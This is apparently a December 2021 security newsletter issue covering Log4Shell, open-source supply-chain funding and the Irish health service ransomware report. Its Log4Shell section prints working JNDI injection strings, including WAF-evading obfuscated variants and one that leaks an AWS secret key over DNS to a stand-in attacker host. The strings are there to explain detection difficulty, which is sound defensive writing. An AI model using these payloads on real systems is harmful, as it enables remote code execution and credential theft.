Your weekly dose of Seriously Risky Business news is written by Tom Uren, edited by Patrick Gray and supported by the Cyber Initiative at the Hewlett Foundation, AustCyber and founding corporate sponsors CyberCX and Proofpoint.
Log4Shell: Yes, it's That Bad
The vulnerability disclosed in the Java Log4j logging library last week is, to put it mildly, quite bad. It also proves we need to pay more attention to little-known but pervasive software in the open source supply chain.
First, let's talk about the actual vulnerability.
The 'Log4Shell' bug allows an attacker to execute arbitrary code by getting a vulnerable Java application to log a malicious string. When vulnerable versions of Log4j process that string they perform a JNDI lookup that can fetch and run attacker-supplied code. This is very easy to trigger, and Java (and thus Log4j) is everywhere. CISA (with some help from Kevin Beaumont) and the Dutch NCSC are compiling lists of which applications use Log4j, and the range of products affected is huge: see this list of affected products and this list of security advisories.
Logging is pervasive across all types of software, and this bug can be triggered simply by getting a malicious string into anything that might be logged. That includes HTTP requests (eg User-Agent or custom X- headers), usernames, and even iPhone names. Some of the first reports were of Minecraft users triggering the bug by pasting the string into chat. The string can even pass through invulnerable and/or non-Java applications before landing on a vulnerable (and perhaps not internet-facing) Java application. Researchers looking for vulnerable applications have seen the bug trigger as long as twelve hours after the malicious string was first inserted into an application somewhere else.
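To make the mechanism concrete, here's a minimal sketch of the vulnerable pattern, assuming a pre-fix log4j-core (2.14.1 or earlier) on the classpath. The class name and the attacker.example domain are placeholders of ours, not taken from any real incident.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Minimal sketch of the vulnerable pattern, assuming log4j-core <= 2.14.1 on the classpath.
public class Log4ShellSketch {
    private static final Logger LOGGER = LogManager.getLogger(Log4ShellSketch.class);

    public static void main(String[] args) {
        // Imagine this value arrived in a User-Agent header, a username field or a chat message.
        String attackerControlled = "${jndi:ldap://attacker.example/a}";

        // On vulnerable versions, Log4j expands the ${jndi:...} token in the logged message,
        // making an outbound LDAP request that can load and execute attacker-supplied code.
        LOGGER.error("Request from user agent: {}", attackerControlled);
    }
}
```

The only 'attack' step is getting that string into something the application eventually logs, which is why the bug is so easy to trigger at scale.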
The attacks started before a Log4j patch was even released and grew into mass exploitation over the weekend after a PoC was published to GitHub. Cryptomining botnets were some of the first to take advantage (turning stolen computing capacity into cryptocurrency). Since then the bug has been used by access brokers, by state actors from China, Iran, North Korea and Turkey, and in a new strain of ransomware. In short, it's being used by all sorts of people to do all sorts of things, and we can expect even more types of attackers to pile in with all sorts of other creative uses.
Despite this, it's still not clear where the overall impact will fall on the range from 'very bad' to 'catastrophic'.
Not all vulnerable products will be patched quickly or even at all. Log4Shell will have a long tail and will be incorporated into red team and ransomware playbooks literally for years to come.
Some large organisations are responding quickly, so it's also possible that a lot of exposure will be patched out relatively quickly. But some products will remain vulnerable for what feels like an eternity. Some of Cisco's vulnerable products, for example, aren't scheduled to be fixed until Christmas Eve. That's an awful exposure window for its customers.
For affected organisations there is no shortage of advice. Vendors need to patch, but given the large number of vulnerable products (see Cisco and VMware's lists for example) this may take a while. In the meantime CISA recommends enumerating vulnerable applications and taking mitigation steps, chasing down all alerts, and using a Web Application Firewall with rules that automatically update to at least filter out some attack traffic. We'd add network-based egress controls that restrict outbound connections to attacker-controlled infrastructure to the list — they're critically important right now.
Even so, these measures will only get you so far. WAFs will only catch the dumbest-of-the-dumb exploitation attempts and you can only chase down alerts if they actually trigger. There are so many different ways to exploit this bug (with different types of malicious strings) that detecting it in your production environment — if the attacker has half a clue — is very hard to do reliably. And even if you've got your egress filtering pinned down, an attacker could still get creative and exfiltrate sensitive environment variables and access keys via DNS requests. (We hear this is happening already. As we said, this is bad.)
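To illustrate why detection is so hard, here's a hedged sketch of the kinds of strings involved. The nested-lookup variants and the attacker.example domain are illustrative examples of ours, not an exhaustive or authoritative list.

```java
// Illustrative payload shapes only; attacker.example is a placeholder domain.
public class Log4ShellVariants {
    public static void main(String[] args) {
        String[] samples = {
            // The 'textbook' payload that simple WAF rules look for.
            "${jndi:ldap://attacker.example/a}",

            // Obfuscated variants: nested lookups reassemble the 'jndi' keyword at
            // resolution time, so a literal match on "${jndi:" misses them.
            "${${lower:j}${lower:n}di:ldap://attacker.example/a}",
            "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",

            // Data theft without code execution: the environment lookup is resolved and
            // the secret leaks via the DNS query for the resulting hostname.
            "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.example/a}"
        };
        for (String s : samples) {
            System.out.println(s);
        }
    }
}
```

Note that the last example doesn't need a successful code-execution callback at all: the secret leaks in the DNS resolution of the crafted hostname, which is exactly the behaviour the egress and DNS monitoring advice above is meant to catch.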
All this from a bug in software most people had never heard of until a week ago. CISA Director Jen Easterly highlighted the implications this incident has for understanding the software supply chain:
This effort also underscores the urgency of building software securely from the start and more widespread use of Software Bill of Materials (SBOM), both of which were directed by President Biden in his Executive Order issued in May 2021. A SBOM would provide end users with the transparency they require to know if their products rely on vulnerable software libraries.
Improved transparency makes it easier to respond to these types of supply chain vulnerabilities. But what can be done to remove vulnerabilities from the open source supply chain in the first place?
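As a toy illustration of the kind of check an SBOM makes possible, here's a hedged Java sketch that scans a flat component inventory for vulnerable log4j-core versions. The component list, the 2.16.0 cut-off and the naive version comparison are simplifying assumptions of ours; real SBOMs use formats like SPDX or CycloneDX, and real tooling does this properly.

```java
import java.util.Map;

// Toy illustration of an SBOM-style check; the inventory below is hypothetical.
public class SbomCheck {
    public static void main(String[] args) {
        // Hypothetical inventory extracted from an SBOM: component coordinates -> version.
        Map<String, String> components = Map.of(
            "org.apache.logging.log4j:log4j-core", "2.14.1",
            "org.slf4j:slf4j-api", "1.7.32",
            "ch.qos.logback:logback-core", "1.2.7"
        );

        components.forEach((name, version) -> {
            if (name.equals("org.apache.logging.log4j:log4j-core") && isBefore(version, "2.16.0")) {
                System.out.println("Potentially vulnerable to Log4Shell: " + name + " " + version);
            }
        });
    }

    // Naive numeric version comparison; good enough for this sketch.
    private static boolean isBefore(String version, String threshold) {
        String[] a = version.split("\\.");
        String[] b = threshold.split("\\.");
        for (int i = 0; i < Math.min(a.length, b.length); i++) {
            int cmp = Integer.compare(Integer.parseInt(a[i]), Integer.parseInt(b[i]));
            if (cmp != 0) return cmp < 0;
        }
        return a.length < b.length;
    }
}
```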
There are a couple of relatively new initiatives that are trying to help.
One effort underway is the Managed Audit Program (MAP) at the Open Source Technology Improvement Fund (OSTIF), which is trying to identify the most important FOSS projects and fund security improvement work on them. The MAP came up with an initial top 25 list of projects, chosen using various metrics together with advisory council input. And in September Google's Open Source Security Team announced funding for audits of just eight of those top 25 projects.
Interestingly, two logging projects made the cut. The Slf4j Java logging facade is one of the funded projects, and the Google Open Source Security Team's funding announcement cites its wide use, the project's age, and its history of vulnerability reports as reasons for inclusion. Logback-core, yet another Java logging project, is also in the top 25, although so far unfunded.
Other projects on the MAP top 25 list seem pretty deserving, though: Git, Drupal, Electron, Node.js… which highlights just how much commonly used software is open source. Given that Log4j didn't make the list, we wonder how many other potentially high-impact vulnerabilities are just lying around in low-key, ubiquitous open source projects, waiting to be discovered.
A second effort, the Secure Open Source Rewards pilot program, aims to improve security more broadly throughout the FOSS ecosystem. Qualifying projects can earn modest monetary rewards for security improvements and Google is pitching in USD$1m funding.
The fundamental problem here is that some FOSS projects can grow to become extremely important — they really become part of internet infrastructure — but they don't typically receive commensurate levels of security expertise and funding. So what is an 'acceptable' level of risk for a small project becomes unacceptable as a project becomes more important.
Our current default approach is simply to accept that terrible supply-chain vulnerabilities are going to be found and aim to get better at dealing with these incidents. A Software Bill of Materials is just one step towards faster remediation. But, as we explained above, even the companies that do have good insight into their products — like Cisco — will take some time to roll out fixes. The exposure window on this thing is awful.
An entirely reactive response doesn't seem like enough. Many companies that rely heavily on open source software make a tonne of money from it, so more funding for OSTIF's MAP seems like a no-brainer: let's at least do something about the top 25 projects.
Another approach here might be to actively shape the culture of FOSS so that foundational software projects get funded before disaster strikes. It does seem ludicrous that sponsorship of Log4j's maintainers only increased many-fold after Log4Shell was discovered.
This isn't a newly identified risk. Application security specialist Veracode noted in its State of Software Security report that third-party software components are common, and there is a "nesting effect" where third-party components often contain other third-party components. Some recommendations:
...conduct security testing on third-party components prior to integrating into [a] final application. Do not develop a false sense of security and control when developing applications with internal teams given the abundance of third-party code integrated into all software.
And specifically on open source software:
...given the risks associated with using code of unknown security, test outsourced, commercial, and open source suppliers as rigorously as you would test internally developed code for security quality and backdoors.
You can read that report here. The punchline? Those quotes come from the Veracode report published in March 2010.
Ransomware Rot Starts at the Top
A PricewaterhouseCoopers report into the May 2021 ransomware attack on the Irish public health system is an all-too-rare glimpse into the governance failures that contribute to ransomware incidents.
The Health Service Executive (HSE), which provides Ireland's public health services, was hit by Conti ransomware on 14 May 2021. The initial infection stemmed from a phishing attack on 18 March, after which the attacker moved laterally and escalated privileges over the subsequent eight weeks before deploying the ransomware. The ransomware severely disrupted healthcare services, and management reported that 80% of the HSE's IT environment was encrypted by the attackers.
There were several missed opportunities to detect and disrupt the attack in this period. Antivirus software detected the use of Mimikatz and Cobalt Strike on the 'patient zero' workstation and later in another hospital, but didn't quarantine or block execution of the files. The HSE's cyber security provider even emailed the HSE Security Operations team twice about different alerts, but the subsequent actions didn't uncover the ransomware activity.
The PwC report concluded the HSE was woefully unprepared for the risks it faced, despite having earlier flagged security improvements as a priority. In 2019, cyber security was listed as a "HIGH" risk on the HSE's risk register, with a 75% chance of "MAJOR" impact, yet:
The HSE’s IT-related risks had been presented at Board level on a number of occasions. However, the gravity of cybersecurity exposure was not fully articulated to the Board, given the HSE’s level of vulnerability to a cyber attack, or assessed against a defined risk appetite. Known issues with cybersecurity capability have made limited progress over the course of several years.
In other words, HSE identified cyber security risk as a problem but didn't do enough about it to prevent the attack.
This lack of management attention manifested in many different ways. There was no CISO or any individual responsible for cyber security, no clear delineation between IT and cyber security, and the IT organisation simply didn't have enough people.
This flowed down to the operational level. One third of the HSE's servers were deemed end-of-life, as were over 30,000 Windows 7 workstations. There was no effective security monitoring capability across the HSE's IT environment, coupled with "a lack of effective patching". The HSE's endpoint antivirus solution wasn't deployed everywhere, was only configured to monitor malicious activity (not block it), and wasn't monitored 24/7. Additionally, the antivirus on the patient zero workstation hadn't been updated for over a year.
Conti initially demanded a ransom to decrypt, but within a week it provided the decryption key for free. Even with the key, it still took four months to fully recover, and the HSE's Director-General pegged immediate recovery costs at USD$120m.
Despite all this, PwC found the attack could have been a lot worse: Conti didn't try to attack medical devices or deliberately destroy data, at least. And given the lack of preparedness, the HSE's response was judged to be quite good.
The report's recommendations focus on building IT and cyber security leadership and governance to "provide appropriate focus, attention and oversight". It warns, however, that the transformation will require several years and:
The required investment commitment is likely to be a multiple of the HSE’s current expenditure on technology and operational resilience, but is essential to protect the HSE against future attacks which are inevitable and have the potential to be even more damaging.
This kind of report is great because it does away with the bs "amazingly sophisticated and persistent adversary" narrative. It draws a straight line between leadership and management dysfunction and the multitude of operational shortcomings. But beyond a post-mortem and various specific recommendations, it also clearly spells out the rationale for spending a whole lot more effort and money on improving IT and cyber security governance. It's up to budget-holders to make that difficult decision now.
Three Reasons to be Cheerful this Week:
Windows is basically a collection of dodgy drivers. Now, you can snitch on them: Microsoft has launched a web portal for reporting suspicious or malicious drivers for analysis. An automated scanner will send suspicious drivers for more in-depth analysis — malicious drivers will be blocklisted and vulnerable drivers reported to vendors.
Hack DHS for fun and profit: The US Department of Homeland Security has launched a 'Hack DHS' bug bounty program. Just make sure you stay within the rules of engagement.
Cryptocurrency security improves: Only USD$140m stolen this week!
Paying the Bills
Risky Business has launched something new: product demos that we're publishing to YouTube. This new sponsorship product will help us fund this newsletter and make it sustainable, so if you happen to subscribe to our new product demo page on YouTube we sure would appreciate it. We published two demos last week. The first is with Remediant co-founder Paul Lanzi showing off their network-based (read: "actually deployable") PAM solution. The second is with Ryan Noon of Material Security. They make a product that secures and redacts email at rest, but it has a lot of other features too.
Shorts
Russia to Block Tor
The Russian government is blocking access to Tor. Interestingly, Russia has the second-largest Tor user base, with 300,000 daily users, or 15% of the global total. The Tor Project is asking for volunteers to spin up Tor bridges, censorship-resistant on-ramps to the Tor network. We wonder how long before Russia starts blocking those, too.
CISA Advice for Influencers #Blessed
CISA has released guidance on how organisations should manage their social media accounts. Its other guides cover web browsers, phishing and mobile devices. The guides are aimed at federal government bodies, but the measures look pretty sensible and apply more broadly.
Bad People Doing Cool Stuff For Awful Reasons
Ian Beer & Samuel Groß of Google Project Zero have released a deep dive into NSO's zero-click iMessage exploit. It's described as "one of the most technically sophisticated exploits we've ever seen". It abused the logic in an old fax compression algorithm to define a small computer architecture which was then used to run sandbox escape code. Amazing, although P0's head Tim Willis points out that NSO isn't so exceptional — it's just that they got caught this time. There are plenty of other sharks in the sea, and given recent events we expect to see some more of them in the news soon enough.
Last Edition of 2021
This is the last edition of the year. Thanks very much for your support and have a great end of year holiday season. Seriously Risky Business will be back in the New Year.